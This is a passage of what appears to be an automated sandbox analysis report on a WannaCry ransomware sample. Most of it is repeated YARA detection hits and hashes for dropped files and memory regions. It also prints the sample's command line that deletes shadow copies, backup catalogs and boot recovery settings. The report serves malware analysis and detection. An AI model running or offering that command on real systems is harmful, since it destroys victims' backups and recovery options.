                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
                  Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,28_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,28_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004046F0 CryptImportKey,28_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,37_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,37_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004046F0 CryptImportKey,37_2_004046F0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 43.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 49.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 49.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 52.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 52.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 37.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 43.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 28.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 28.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\Users\user\Desktop\198851684139341.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 43.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 49.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 49.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 52.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 52.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 37.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 43.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 28.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 28.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 00000004.00000002.2989666418.000001846CCE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth (Nextron Systems), description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\WANNACRY.bin, type: DROPPEDMatched rule: SUSP_certificate_payload date = 2018/08/02, author = Didier Stevens, Florian Roth, description = Detects payloads that pretend to be certificates, score = , reference = https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\198851684139341.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
